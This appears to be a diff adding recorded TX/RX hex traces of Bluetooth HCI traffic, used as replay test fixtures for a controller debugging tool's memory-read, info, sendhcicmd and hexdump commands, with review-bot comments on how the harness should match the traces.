RX 0000000b0000000300000000
RX 00e269c200b1c4f3
RX 04
RX 0e08014dfc00c8792100
TX 0108004dfc05347a210004
RX 0000000900000009000000020000000000e269c200b38d00
RX 01
RX 4dfc05347a210004
RX 0000000b0000000b
RX 000000030000000000e269c200b3bbaa
RX 040e08014dfc00c85d2000
TX 0108004dfc05587a210004
RX 0000000900000009000000020000000000e269c200b58252
RX 014dfc05587a210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00b5b18b
RX 040e08014dfc00ec792100
TX 0108004dfc057c7a210004
RX 0000000900000009000000020000000000e269c200b6f455
RX 014dfc057c7a210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00b728c4
RX 040e08014dfc00a07a2100
TX 0108004dfc05a07a210004
RX 000000090000000900000002
RX 0000000000e269c200b8f1d6
RX 014dfc05a07a210004
RX 0000000b0000000b000000030000000000e269c2
RX 00b92612
RX 040e08014dfc0000000000
TX 0108004dfc05f85d200030
RX 0000000900000009
RX 000000020000000000e269c2
RX 00ba65be
RX 014dfc05f85d200030
RX 00000037000000370000000300000000
RX 00e269c200ba9b76
RX 04
RX 0e34014dfc00434f4c42000000000700000008000000087b2100c47a210020020000400000000000000000000000285e2000c85d2000
TX 0108004dfc05c47a210004
RX 000000090000000900000002
RX 0000000000e269c200bc6390
RX 014dfc05c47a210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00bc987e
RX 04
RX 0e08014dfc00087b2100
TX 0108004dfc05087b210004
RX 0000000900000009000000020000000000e269c2
RX 00bdd708
RX 014dfc05087b210004
RX 0000000b0000000b0000000300000000
RX 00e269c200be075f
RX 04
RX 0e08014dfc004c7b2100
TX 0108004dfc054c7b210004
RX 0000000900000009000000020000000000e269c200bfd07f
RX 014dfc054c7b210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00bfffe2
RX 040e08014dfc00907b2100
TX 0108004dfc05907b210004
RX 000000090000000900000002
RX 0000000000e269c200c1c264
RX 014dfc05907b210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00c1fba1
RX 040e08014dfc00d47b2100
TX 0108004dfc05d47b210004
RX 000000090000000900000002
RX 0000000000e269c200c339f3
RX 014dfc05d47b210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00c36f64
RX 040e08014dfc00187c2100
TX 0108004dfc05187c210004
RX 0000000900000009000000020000000000e269c200c53386
RX 014dfc05187c210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00c56249
RX 040e08014dfc005c7c2100
TX 0108004dfc055c7c210004
RX 0000000900000009000000020000000000e269c2
RX 00c6a64c
RX 014dfc055c7c210004
RX 0000000b0000000b0000000300000000
RX 00e269c200c6d51e
RX 04
RX 0e08014dfc00a07c2100
TX 0108004dfc05a07c210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00c8a176
RX 014dfc05a07c210004
RX 0000000b0000000b0000000300000000
RX 00e269c200c8daef
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc05285e200030
RX 0000000900000009
RX 000000020000000000e269c2
RX 00ca1661
RX 014dfc05285e200030
RX 000000370000003700000003
RX 0000000000e269c200ca4c0b
RX 040e34014dfc00434f4c42000000000a0000000a000000e47c2100e47c2100780a0000080100000000000000000000885e2000f85d2000
TX 0108004dfc05e47c210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00cc13aa
RX 014dfc05e47c210004
RX 0000000b0000000b0000000300000000
RX 00e269c200cc49c8
RX 04
RX 0e08014dfc00f07d2100
TX 0108004dfc05f07d210004
RX 00000009000000090000000200000000
RX 00e269c200ce084a
RX 014dfc05f07d210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00ce3d02
RX 040e08014dfc00fc7e2100
TX 0108004dfc05fc7e210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00cf7abc
RX 014dfc05fc7e210004
RX 0000000b0000000b0000000300000000
RX 00e269c200cfafff
RX 04
RX 0e08014dfc0008802100
TX 0108004dfc050880210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00d1718e
RX 014dfc050880210004
RX 0000000b0000000b0000000300000000
RX 00e269c200d1ad02
RX 040e08014dfc0014812100
TX 0108004dfc051481210004
RX 0000000900000009000000020000000000e269c200d2e49d
RX 01
RX 4dfc051481210004
RX 0000000b0000000b
RX 000000030000000000e269c200d313fc
RX 040e08014dfc0020822100
TX 0108004dfc052082210004
RX 0000000900000009000000020000000000e269c2
RX 00d4dfc6
RX 014dfc052082210004
RX 0000000b0000000b00000003
RX 0000000000e269c200d50e59
RX 040e08014dfc002c832100
TX 0108004dfc052c83210004
RX 00000009000000090000000200000000
RX 00e269c200d65308
RX 01
RX 4dfc052c83210004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00d68806
RX 040e08014dfc0038842100
TX 0108004dfc053884210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00d84aba
RX 014dfc053884210004
RX 0000000b0000000b00000003
RX 0000000000e269c200d88584
RX 040e08014dfc0044852100
TX 0108004dfc054485210004
RX 0000000900000009000000020000000000e269c2
RX 00da42d6
RX 014dfc054485210004
RX 0000000b0000000b00000003
RX 0000000000e269c200da7651
RX 040e08014dfc0050862100
TX 0108004dfc055086210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00dbba9e
RX 014dfc055086210004
RX 0000000b0000000b00000003
RX 0000000000e269c200dbf538
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc05885e200030
RX 00000009000000090000000200000000
RX 00e269c200ddb037
RX 01
RX 4dfc05885e200030
RX 000000370000003700000003
RX 0000000000e269c200dde9b6
RX 040e34014dfc00434f4c4200000000040000000400000024c6210024c62100b0100000280400000000000000000000585e2000285e2000
TX 0108004dfc0524c6210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00df268a
RX 014dfc0524c6210004
RX 0000000b0000000b0000000300000000
RX 00e269c200df5cd7
RX 040e08014dfc0050ca2100
TX 0108004dfc0550ca210004
RX 0000000900000009000000020000000000e269c2
RX 00e11eb6
RX 01
RX 4dfc0550ca210004
RX 0000000b0000000b00000003
RX 0000000000e269c200e15819
RX 040e08014dfc007cce2100
TX 0108004dfc057cce210004
RX 00000009000000090000000200000000
RX 00e269c200e29334
RX 01
RX 4dfc057cce210004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00e2c73e
RX 040e08014dfc00a8d22100
TX 0108004dfc05a8d2210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00e4925e
RX 014dfc05a8d2210004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200e4c673
RX 040e08014dfc0000000000
TX 0108004dfc05585e200030
RX 0000000900000009
RX 000000020000000000e269c2
RX 00e5ff65
RX 014dfc05585e200030
RX 000000370000003700000003
RX 0000000000e269c200e63326
RX 040e34014dfc00434f4c42000000001000000010000000d4d62100d4d621008044000044040000000000000000000038ec2000885e2000
TX 0108004dfc05d4d6210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00e7fcce
RX 014dfc05d4d6210004
RX 0000000b0000000b0000000300000000
RX 00e269c200e8313f
RX 040e08014dfc001cdb2100
TX 0108004dfc051cdb210004
RX 0000000900000009000000020000000000e269c200e9f3c0
RX 014dfc051cdb210004
RX 0000000b0000000b
RX 000000030000000000e269c2
RX 00ea223f
RX 040e08014dfc0064df2100
TX 0108004dfc0564df210004
RX 00000009000000090000000200000000
RX 00e269c200eb6947
RX 01
RX 4dfc0564df210004
RX 0000000b0000000b00000003
RX 0000000000e269c200eb9dc8
RX 04
RX 0e08014dfc00ace32100
TX 0108004dfc05ace3210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00ed6025
RX 014dfc05ace3210004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00edb820
RX 040e08014dfc00f4e72100
TX 0108004dfc05f4e7210004
RX 00000009000000090000000200000000
RX 00e269c200eeaa84
RX 014dfc05f4e7210004
RX 0000000b0000000b000000030000000000e269c200eeb23c
RX 04
RX 0e08014dfc003cec2100
TX 0108004dfc053cec210004
RX 0000000900000009
RX 000000020000000000e269c200ef25f0
RX 01
RX 4dfc053cec210004
RX 0000000b
RX 0000000b000000030000000000e269c200ef2e26
RX 04
RX 0e08014dfc0084f02100
TX 0108004dfc0584f0210004
RX 0000000900000009000000020000000000e269c200efa285
RX 014dfc0584f0210004
RX 0000000b
RX 0000000b000000030000000000e269c200efa979
RX 040e08014dfc00ccf42100
TX 0108004dfc05ccf4210004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00f0207c
RX 014dfc05ccf4210004
RX 0000000b0000000b0000000300000000
RX 00e269c200f028c8
RX 04
RX 0e08014dfc0014f92100
TX 0108004dfc0514f9210004
RX 0000000900000009000000020000000000e269c200f0b8fd
RX 014dfc0514f9210004
RX 0000000b0000000b0000000300000000
RX 00e269c200f0bf4a
RX 040e08014dfc005cfd2100
TX 0108004dfc055cfd210004
RX 00000009000000090000000200000000
RX 00e269c200f11c7d
RX 01
RX 4dfc055cfd210004
RX 0000000b0000000b00000003
RX 0000000000e269c200f12aa4
RX 040e08014dfc00a4012200
TX 0108004dfc05a401220004
RX 0000000900000009000000020000000000e269c200f1946c
RX 014dfc05a401220004
RX 0000000b0000000b00000003
RX 0000000000e269c200f19f40
RX 040e08014dfc00ec052200
TX 0108004dfc05ec05220004
RX 0000000900000009000000020000000000e269c200f20f44
RX 01
RX 4dfc05ec05220004
RX 0000000b0000000b00000003
RX 0000000000e269c200f21b6a
RX 04
RX 0e08014dfc00340a2200
TX 0108004dfc05340a220004
RX 0000000900000009000000020000000000e269c200f29be7
RX 014dfc05340a220004
RX 0000000b
RX 0000000b000000030000000000e269c2
RX 00f2b3bd
RX 040e08014dfc007c0e2200
TX 0108004dfc057c0e220004
RX 00000009
RX 00000009
RX 0000000200000000
RX 00e269c200f3a7c6
RX 01
RX 4dfc057c0e220004
RX 0000000b0000000b000000030000000000e269c2
RX 00f4951f
RX 040e08014dfc00c4122200
TX 0108004dfc05c412220004
RX 0000000900000009
RX 000000020000000000e269c200f637e5
RX 014dfc05c412220004
RX 0000000b0000000b000000030000000000e269c200f63f91
RX 040e08014dfc000c172200
TX 0108004dfc050c17220004
RX 00000009
RX 000000090000000200000000
RX 00e269c200f6f156
RX 014dfc050c17220004
RX 0000000b0000000b0000000300000000
RX 00e269c200f6f966
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc0538ec200030
RX 00000009000000090000000200000000
RX 00e269c200f76de0
RX 014dfc0538ec200030
RX 0000003700000037000000030000000000e269c200f7757d
RX 040e34014dfc00434f4c42000000000f0000000f000000541b2200541b22009402000028000000000000000000000068ec2000585e2000
TX 0108004dfc05541b220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00f8133d
RX 014dfc05541b220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200f83a20
RX 04
RX 0e08014dfc00801b2200
TX 0108004dfc05801b220004
RX 0000000900000009000000020000000000e269c200f909ee
RX 014dfc05801b220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c200f935e2
RX 04
RX 0e08014dfc00ac1b2200
TX 0108004dfc05ac1b220004
RX 0000000900000009000000020000000000e269c2
RX 00fb146c
RX 014dfc05ac1b220004
RX 0000000b
RX 0000000b00000003
RX 0000000000e269c200fb4327
RX 040e08014dfc00d81b2200
TX 0108004dfc05d81b220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 00fd0682
RX 014dfc05d81b220004
RX 0000000b0000000b0000000300000000
RX 00e269c200fd3fca
RX 04
RX 0e08014dfc00041c2200
TX 0108004dfc05041c220004
RX 00000009000000090000000200000000
RX 00e269c200fe7d8e
RX 01
RX 4dfc05041c220004
RX 0000000b0000000b00000003
RX 0000000000e269c200feb0d4
RX 040e08014dfc00301c2200
TX 0108004dfc05301c220004
RX 0000000900000009000000020000000000e269c2
RX 010074cc
RX 014dfc05301c220004
RX 0000000b0000000b0000000300000000
RX 00e269c20100a76b
RX 04
RX 0e08014dfc005c1c2200
TX 0108004dfc055c1c220004
RX 0000000900000009000000020000000000e269c20101eacb
RX 014dfc055c1c220004
RX 0000000b0000000b0000000300000000
RX 00e269c201021779
RX 04
RX 0e08014dfc00881c2200
TX 0108004dfc05881c220004
RX 0000000900000009000000020000000000e269c20103e6c3
RX 014dfc05881c220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201041515
RX 04
RX 0e08014dfc00b41c2200
TX 0108004dfc05b41c220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 01055aa2
RX 014dfc05b41c220004
RX 0000000b0000000b0000000300000000
RX 00e269c201058f0e
RX 040e08014dfc00e01c2200
TX 0108004dfc05e01c220004
RX 000000090000000900000002
RX 0000000000e269c201075199
RX 014dfc05e01c220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201078a8c
RX 04
RX 0e08014dfc000c1d2200
TX 0108004dfc050c1d220004
RX 0000000900000009000000020000000000e269c2
RX 010948a2
RX 014dfc050c1d220004
RX 0000000b0000000b0000000300000000
RX 00e269c201097c0d
RX 04
RX 0e08014dfc00381d2200
TX 0108004dfc05381d220004
RX 0000000900000009
RX 000000020000000000e269c2010ac2b3
RX 014dfc05381d220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c2010afeef
RX 04
RX 0e08014dfc00641d2200
TX 0108004dfc05641d220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 010cbc41
RX 014dfc05641d220004
RX 0000000b0000000b00000003
RX 0000000000e269c2010cefe5
RX 040e08014dfc00901d2200
TX 0108004dfc05901d220004
RX 00000009000000090000000200000000
RX 00e269c2010e2df1
RX 01
RX 4dfc05901d220004
RX 0000000b0000000b00000003
RX 0000000000e269c2010e61ea
RX 040e08014dfc00bc1d2200
TX 0108004dfc05bc1d220004
RX 000000090000000900000002
RX 0000000000e269c20110231e
RX 014dfc05bc1d220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201105c92
RX 04
RX 0e08014dfc0000000000
TX 0108004dfc0568ec200030
RX 0000000900000009000000020000000000e269c2
RX 01119816
RX 014dfc0568ec200030
RX 00000037000000370000000300000000
RX 00e269c20111c667
RX 04
RX 0e34014dfc00434f4c42000000000f0000000f000000e81d2200e81d22001c020000200000000000000000000000c85d200038ec2000
TX 0108004dfc05e81d220004
RX 00000009000000090000000200000000
RX 00e269c201138f25
RX 01
RX 4dfc05e81d220004
RX 0000000b0000000b
RX 000000030000000000e269c20113c768
RX 040e08014dfc000c1e2200
TX 0108004dfc050c1e220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 011507e7
RX 014dfc050c1e220004
RX 0000000b0000000b0000000300000000
RX 00e269c201153d26
RX 04
RX 0e08014dfc00301e2200
TX 0108004dfc05301e220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 0116fe0e
RX 014dfc05301e220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201173734
RX 04
RX 0e08014dfc00541e2200
TX 0108004dfc05541e220004
RX 0000000900000009000000020000000000e269c20118f296
RX 014dfc05541e220004
RX 0000000b0000000b
RX 000000030000000000e269c2011926ef
RX 040e08014dfc00781e2200
TX 0108004dfc05781e220004
RX 0000000900000009000000020000000000e269c2011a6bbe
RX 014dfc05781e220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c2011a9958
RX 04
RX 0e08014dfc009c1e2200
TX 0108004dfc059c1e220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 011c676b
RX 014dfc059c1e220004
RX 0000000b0000000b00000003
RX 0000000000e269c2011c9b6e
RX 040e08014dfc00c01e2200
TX 0108004dfc05c01e220004
RX 0000000900000009000000020000000000e269c2
RX 011dda94
RX 014dfc05c01e220004
RX 0000000b0000000b0000000300000000
RX 00e269c2011e0829
RX 04
RX 0e08014dfc00e41e2200
TX 0108004dfc05e41e220004
RX 0000000900000009000000020000000000e269c2011fd393
RX 014dfc05e41e220004
RX 0000000b0000000b
RX 0000000300000000
RX 00e269c201200234
RX 040e08014dfc00081f2200
TX 0108004dfc05081f220004
RX 0000000900000009000000020000000000e269c2
RX 012145f7
RX 014dfc05081f220004
RX 0000000b0000000b0000000300000000
RX 00e269c20121a431
RX 04
RX 0e08014dfc002c1f2200
TX 0108004dfc052c1f220004
RX 000000090000000900000002
RX 0000000000e269c201230eec
RX 014dfc052c1f220004
RX 0000000b0000000b0000000300000000
RX 00e269c201231658
RX 040e08014dfc00501f2200
TX 0108004dfc05501f220004
RX 0000000900000009
RX 000000020000000000e269c20124484f
RX 014dfc05501f220004
RX 0000000b0000000b0000000300000000
RX 00e269c201244f7a
RX 040e08014dfc00741f2200
TX 0108004dfc05741f220004
RX 00000009
RX 00000009000000020000000000e269c201250543
RX 01
RX 4dfc05741f220004
RX 0000000b0000000b000000030000000000e269c2
RX 01250d7b
RX 040e08014dfc00981f2200
TX 0108004dfc05981f220004
RX 0000000900000009
RX 000000020000000000e269c2
RX 0125e492
RX 014dfc05981f220004
RX 0000000b0000000b00000003
RX 0000000000e269c201260ab3
RX 040e08014dfc00bc1f2200
TX 0108004dfc05bc1f220004
RX 0000000900000009000000020000000000e269c2
RX 01276da0
RX 014dfc05bc1f220004
RX 0000000b
RX 0000000b0000000300000000
RX 00e269c201279c46
RX 040e08014dfc00e01f2200
TX 0108004dfc05e01f220004
RX 0000000900000009000000020000000000e269c2
RX 0128e461
RX 014dfc05e01f220004
RX 0000000b0000000b00000003
RX 0000000000e269c2012914b3
RX 040e08014dfc0000000000
Socket closed
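Review bot: every RX record in this trace begins with a 24-byte header whose last eight bytes increase monotonically through the file (`00e269c200b19061`, `00e269c200b1c4f3`, `00e269c200b38d00`, ...), which looks like a host timestamp, so the replay harness must feed RX data back verbatim and match only on TX lines; a harness that compares RX content will never pass against a re-recorded trace. A one-line comment at the top of the file stating that rule would help whoever regenerates these traces next.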
@@ -0,0 +1,148 @@
# info queue
TX 010300011000
RX 0000000400000004000000020000000000e269c2663770fc
RX 01011000
RX 0000000f0000000f000000030000000000e269c26637a4a7
RX 040e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc057c30200004
RX 00000003000000030000000300000000
RX 00e269c266390c8a
RX 07f001
RX 00000009
RX 000000090000000200000000
RX 00e269c2663974da
RX 01
RX 4dfc057c30200004
RX 0000000b0000000b
RX 000000030000000000e269c26639ac63
RX 040e08014dfc0090652000
TX 0108004dfc059065200038
RX 000000090000000900000002
RX 0000000000e269c2
RX 663b4f1a
RX 014dfc059065200038
RX 0000003f0000003f0000000300000000
RX 00e269c2663b83d8
RX 040e3c014dfc00554555510000000001000000100000000000000010000000c8652000086620000466200004662000000000000000000044662000ecad2000
TX 0108004dfc054466200038
RX 000000090000000900000002
RX 0000000000e269c2663d419c
RX 014dfc054466200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 663d7aab
RX 040e3c014dfc005545555100000000020000001f000000000000001f0000007c66200074672000ac662000ac66200000000000000000007467200090652000
TX 0108004dfc057467200038
RX 0000000900000009000000020000000000e269c2
RX 663ebb9e
RX 014dfc057467200038
RX 0000003f0000003f00000003
RX 0000000000e269c2663eeac6
RX 040e3c014dfc00554555510000000001000000030000000000000003000000ac672000b8672000ac672000ac6720000000000000000000b867200044662000
TX 0108004dfc05b867200038
RX 0000000900000009000000020000000000e269c26640af70
RX 01
RX 4dfc05b867200038
RX 0000003f0000003f
RX 000000030000000000e269c2
RX 6640e3ed
RX 040e3c014dfc005545555100000000010000001f000000000000001f000000f06720006c682000f0672000f067200000000000000000006c68200074672000
TX 0108004dfc056c68200038
RX 0000000900000009000000020000000000e269c26642a534
RX 014dfc056c68200038
RX 0000003f
RX 0000003f0000000300000000
RX 00e269c26642d8cd
RX 04
RX 0e3c014dfc00554555510000000001000000140000000000000014000000a4682000f4682000e0682000e06820000000000000000000f4682000b8672000
TX 0108004dfc05f468200038
RX 0000000900000009000000020000000000e269c266441bec
RX 014dfc05f468200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 6644504f
RX 040e3c014dfc005545555100000000020000000800000000000000080000002c6920006c6920002c6920002c69200000000000000000006c6920006c682000
TX 0108004dfc056c69200038
RX 000000090000000900000002
RX 0000000000e269c2
RX 664611cc
RX 014dfc056c69200038
RX 0000003f
RX 0000003f0000000300000000
RX 00e269c266464b12
RX 04
RX 0e3c014dfc00554555510000000002000000060000000000000006000000a4692000d4692000a4692000a46920000000000000000000d4692000f4682000
TX 0108004dfc05d469200038
RX 00000009000000090000000200000000
RX 00e269c266478916
RX 01
RX 4dfc05d469200038
RX 0000003f0000003f00000003
RX 0000000000e269c26647be39
RX 040e3c014dfc00554555510000000002000000010000000000000001000000100d2000180d2000100d2000100d200000000000000000000c6a20006c692000
TX 0108004dfc050c6a200038
RX 000000090000000900000002
RX 0000000000e269c2664987ae
RX 014dfc050c6a200038
RX 0000003f0000003f
RX 000000030000000000e269c2
RX 6649bc49
RX 040e3c014dfc00554555510000000002000000010000000000000001000000180d2000200d2000180d2000180d20000000000000000000446a2000d4692000
TX 0108004dfc05446a200038
RX 000000090000000900000002
RX 0000000000e269c2664af918
RX 014dfc05446a200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 664b2d9b
RX 040e3c014dfc005545555100000000020000002000000000000000200000007c6a20007c6b20007c6a20007c6a20000000000000000000903320000c6a2000
TX 0108004dfc059033200038
RX 0000000900000009000000020000000000e269c2664cf025
RX 014dfc059033200038
RX 0000003f0000003f
RX 000000030000000000e269c2
RX 664d236e
RX 040e3c014dfc005545555100000000020000000c000000000000000c0000009c732100fc732100ac732100ac7321000000000000000000705b2000446a2000
TX 0108004dfc05705b200038
RX 0000000900000009000000020000000000e269c2
RX 664ee493
RX 014dfc05705b200038
RX 0000003f0000003f0000000300000000
RX 00e269c2664f184e
RX 04
RX 0e3c014dfc00554555510000000001000000080000000000000008000000fc7321001c74210010742100107421000000000000000000c833200090332000
TX 0108004dfc05c833200038
RX 000000090000000900000002
RX 0000000000e269c2665059ac
RX 014dfc05c833200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 6650912f
RX 040e3c014dfc005545555100000000020000001300000000000000130000001c742100b47421001c7421001c7421000000000000000000b4512000705b2000
TX 0108004dfc05b451200038
RX 0000000900000009
RX 000000020000000000e269c266525485
RX 014dfc05b451200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 6652883b
RX 040e3c014dfc00554555510000000002000000060000000000000006000000b4742100e4742100b4742100b4742100000000000000000094ad2000c8332000
TX 0108004dfc0594ad200038
RX 000000090000000900000002
RX 0000000000e269c26653c77b
RX 014dfc0594ad200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 6653fcfb
RX 040e3c014dfc00554555510000000001000000080000000000000008000000ccad2000ecad2000ccad2000ccad20000000000000000000ecad2000b4512000
TX 0108004dfc05ecad200038
RX 0000000900000009
RX 000000020000000000e269c2
RX 6655bd0f
RX 014dfc05ecad200038
RX 0000003f
RX 0000003f000000030000000000e269c2
RX 6655f6b7
RX 040e3c014dfc0055455551000000000100000010000000000000001000000024ae200064ae200024ae200024ae200000000000000000009065200094ad2000
Socket closed
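Review bot: the RX lines are recorded at socket-read granularity rather than per packet (`RX 01` followed by `RX 4dfc057c30200038` near the top of this file, `RX 04` followed by `RX 0e3c014dfc0055455551...` further down), so the replay side must concatenate all RX data into one byte stream before parsing; handing each RX line to the tool as a separate read only works if the reader happens to tolerate exactly these split points. Stating the format (one line = one read result) in the header comment would make that explicit.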
@@ -0,0 +1,36 @@
# sendhcicmd 0x1001
TX 010300011000
RX 00000004
RX 00000004
RX 00000002
RX 00000000
RX 00e269bf
RX 571013e3
RX 01
RX 011000
RX 0000000f0000000f
RX 00000003
RX 00000000
RX 00e269bf
RX 57105c83
RX 04
RX 0e0c01011000075301070f000961
TX 070200f001
RX 000000030000000300000003
RX 0000000000e269bf571262bd
RX 07
RX f001
TX 010300011000
RX 000000040000000400000002
RX 00000000
RX 00e269bf
RX 573133d5
RX 01
RX 011000
RX 0000000f
RX 0000000f
RX 0000000300000000
RX 00e269bf57317b7a
RX 04
RX 0e0c01011000075301070f000961
Socket closed
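Review bot: the command under test (`TX 010300011000`, opcode 0x1001) is byte-identical to the startup probe on the first line, and both Command Complete replies are the same (`0e0c01011000075301070f000961`), so this trace only proves the `sendhcicmd` path if the harness matches TX lines strictly in order; an unordered or set-based matcher would pass even if the command was never sent. Either confirm the matcher is positional or add an assertion that exactly two `010300011000` commands appear.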
@@ -0,0 +1,33 @@
# sendhcicmd 0x1337
TX 010300011000
RX 00000004
RX 00000004
RX 00000002
RX 00000000
RX 00e269bf
RX 5a00c7f5
RX 01
RX 011000
RX 0000000f
RX 0000000f0000000300000000
RX 00e269bf
RX 5a011119
RX 040e0c01011000075301070f000961
TX 070200f001
RX 000000030000000300000003
RX 0000000000e269bf5a030c96
RX 07f001
TX 010300371300
RX 000000040000000400000002
RX 00000000
RX 00e269bf
RX 5a7baf54
RX 01
RX 371300
RX 0000000700000007
RX 00000003
RX 00000000
RX 00e269bf
RX 5a7bf8b7
RX 040e0401371301
Socket closed
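Review bot: the reply to the unknown opcode 0x1337 is `RX 040e0401371301`, a Command Complete whose final byte is status 0x01 (Unknown HCI Command), so this trace exercises the error path; the test that replays it should assert on that status byte rather than only on the absence of an exception, otherwise a controller that silently accepted the opcode would still pass.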
@@ -0,0 +1,34 @@
# hexdump 0
TX 010300011000
RX 0000000400000004000000020000000000e269bf52d3099e
RX 01011000
RX 0000000f0000000f000000030000000000e269bf52d351f1
RX 040e0c01011000075301070f000961
TX 070200f001
RX 00000003000000030000000300000000
RX 00e269bf52d43cea
RX 07f001
TX 0108004dfc0500000000fb
RX 000000090000000900000002
RX 00000000
RX 00e269bf
RX 530f0c74
RX 01
RX 4dfc0500000000fb
RX 00000102
RX 00000102
RX 00000003
RX 00000000
RX 00e269bf
RX 530f5400
RX 04
RX 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
TX 0108004dfc05fb00000005
RX 000000090000000900000002
RX 0000000000e269bf5310814f
RX 014dfc05fb00000005
RX 0000000c0000000c
RX 000000030000000000e269bf
RX 5310b34e
RX 040e09014dfc000067750600
Socket closed
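Review bot: the 256-byte dump at address 0 is issued as two 0xfc4d reads, `4dfc0500000000fb` (0xfb bytes at 0x00000000) and `4dfc05fb00000005` (5 bytes at 0x000000fb), so the trace hard-codes the 0xfb-byte maximum chunk size; if that limit changes in the tool the recorded TX sequence will no longer match and the trace has to be re-recorded. A note to that effect in the header comment would save a confusing test failure later.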
@@ -0,0 +1,187 @@
#info connections
TX 010300011000
RX 0000000400000004000000020000000000e269c211af9287
RX 01011000
RX 0000000f0000000f000000030000000000e269c211afc606
RX 040e0c01011000075301070f000961
TX 070200f001
TX 0108004dfc05e8382000fb
RX 000000030000000300000003
RX 0000000000e269c211b12cec
RX 07f001
RX 00000009000000090000000200000000
RX 00e269c211b19677
RX 01
RX 4dfc05e8382000fb
RX 0000010200000102
RX 000000030000000000e269c2
RX 11b1ce0d
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05e339200051
RX 0000000900000009000000020000000000e269c211b36d33
RX 01
RX 4dfc05e339200051
RX 0000005800000058
RX 000000030000000000e269c2
RX 11b39be7
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05343a2000fb
RX 000000090000000900000002
RX 0000000000e269c211b5679f
RX 014dfc05343a2000fb
RX 000001020000010200000003
RX 0000000000e269c211b59bbc
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc052f3b200051
RX 000000090000000900000002
RX 0000000000e269c211b6da65
RX 014dfc052f3b200051
RX 00000058
RX 000000580000000300000000
RX 00e269c211b7103c
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05803b2000fb
RX 00000009000000090000000200000000
RX 00e269c211b8d0df
RX 01
RX 4dfc05803b2000fb
RX 000001020000010200000003
RX 0000000000e269c211b90a7f
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc057b3c200051
RX 0000000900000009000000020000000000e269c211ba4851
RX 01
RX 4dfc057b3c200051
RX 0000005800000058
RX 000000030000000000e269c2
RX 11ba776c
RX 040e55014dfc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
TX 0108004dfc05cc3c2000fb
RX 000000090000000900000002
RX 0000000000e269c211bc4807
RX 014dfc05cc3c2000fb
RX 0000010200000102
RX 000000030000000000e269c211bc7e24
RX 040eff014dfc000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
